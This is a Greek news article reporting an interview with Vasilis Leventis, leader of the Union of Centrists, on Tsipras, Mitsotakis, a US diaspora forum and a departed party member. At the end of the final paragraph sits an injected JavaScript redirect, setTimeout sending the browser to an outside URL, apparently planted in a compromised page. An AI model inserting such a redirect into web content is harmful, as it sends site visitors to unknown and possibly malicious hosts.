Λεβέντης: Θα παραστώ στην ομιλία Τσίπρα στη ΔΕΘ, αλλά…

0
17

 

O Βασίλης Λεβέντης αποκαλύπτει πως θα παραστεί στην ομιλία του Πρωθυπουργού στη ΔΕΘ, καθώς, όπως είπε, ο Πρωθυπουργός είναι θεσμός. Ωστόσο, σε συνέντευξή του στο ΑΠΕ-ΜΠΕ ο Πρόεδρος της Ένωσης Κεντρώων αρνείται ότι θα μπει σε κυβέρνηση του Αλέξη Τσίπρα, καθώς συνεχίζει να υποστηρίζει τη λύση της οικουμενικής κυβέρνησης.

Μάλιστα όπως είπε: «Το ότι θα παραστώ στη Θεσσαλονίκη σημαίνει ότι είμαι με τον Τσίπρα; Εγώ δήλωσα σήμερα στην ΕΡΤ το εξής «και στο σπίτι μου να έρθει να κοιμάται από εδώ και πέρα ο κ. Τσίπρας η Ένωση Κεντρώων δεν πρόκειται να συνεργαστεί ποτέ μαζί του. Γιατί η εντολή των ψηφοφόρων της Ένωσης Κεντρώων, η εντολή προς εμένα, είναι το 4% να το κάνουμε 14%»».

Ο κ. Λεβέντης εξέφρασε παράλληλα τη βούλησή του να συμμετέχει στη συγκρότηση του ΕΣΡ, «αν ο πρόεδρος της Βουλής βάλει άτομα κύρους».
Αναφορικά με τον διαγωνισμό των τηλεοπτικών αδειών υπογραμμίζει ότι σέβεται το αποτέλεσμα και συγχαίρει τους νικητές.

Αναφερόμενος στον Κυριάκο Μητσοτάκη υπογραμμίζει ότι θα είναι Δεξιά παρένθεση, καθώς δεν θα καταφέρει να βρει 150 βουλευτές και η χώρα θα οδηγηθεί ξανά σε εκλογές με απλή αναλογική. «Με όποιον και να κάνει κυβέρνηση θα τα κάνει μαντάρα διότι αυτά που υπόσχεται ότι έχει άλλες λύσεις ότι θα έρθουν επενδύσεις είναι απατηλά όνειρα. Οπότε θα καταρρεύσει γρήγορα και θα έχει μπροστά του εκλογές χωρίς μπόνους γιατί στις μεθεπόμενες ισχύει η απλή αναλογική . Άρα θα είναι δεξιά παρένθεση. Δεν το έχει καταλάβει ο Μητσοτάκης πάνω στην αρχομανία του. Επιμένει να ζητάει εκλογές ενώ στο τέλος θα την πατήσει» δηλώνει στο ΑΠΕ ο κ.Λεβέντης.

Για το ταξίδι του στην Αμερική και την ενδεχόμενη συνάντησή του με τον Αλέξη Τσίπρα διευκρινίζει ότι δεν έχει καμία σχέση το δικό του ταξίδι με τον πρωθυπουργό. Όπως δηλώνει χαρακτηριστικά: Στην Αμερική δεν πάω για τον Τσίπρα. Στην Αμερική πάω καλεσμένος του φόρουμ των ομογενών οι οποίοι κάνουν μια μεγάλη συνάντηση που θα είναι 40 ξένοι ηγέτες και βεβαίως υπάρχει μέσα και η Χίλαρι Κλίντον, η οποία τη φορά αυτή θα πάρει όλους τους Έλληνες εκεί τους ψηφοφόρους. Εγώ ήμουν καλεσμένος εδώ και δύο μήνες σ αυτό το φόρουμ και είμαι βασικός ομιλητής, τώρα πληροφορήθηκα -προ πενθημέρου- ότι θα είναι και ο πρωθυπουργός.

Τέλος, μιλώντας για τον κ. Καλλιάνο ο οποίος και αποχώρησε πρόσφατα από την Ένωση Κεντρώων υποστηρίζει ότι «επειδή έχει μεγάλη καρδιά» θα τον δεχόταν πίσω αν και ο ίδιος ζητούσε συγνώμη γι’ αυτά που είπε.

«Ο κ. Καλλιάνος την πάτησε γιατί στον Μητσοτάκη που θα πάει, όπως είναι η μεγαλύτερη πιθανότητα, τον πρώτο μήνα θα τον χαϊδεύουν, τον επόμενο μήνα θα τον πετάξουν στα σκουπίδια γιατί εκεί προηγούνται άλλα τζάκια. Μη νομίζει ο Καλλιάνος ότι τη δύναμη που είχε στην Ένωση Κεντρώων θα την έχει εκεί. Εκεί θα είναι ουραγός» είπε ο πρόεδρος της Ένωσης Κεντρώων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here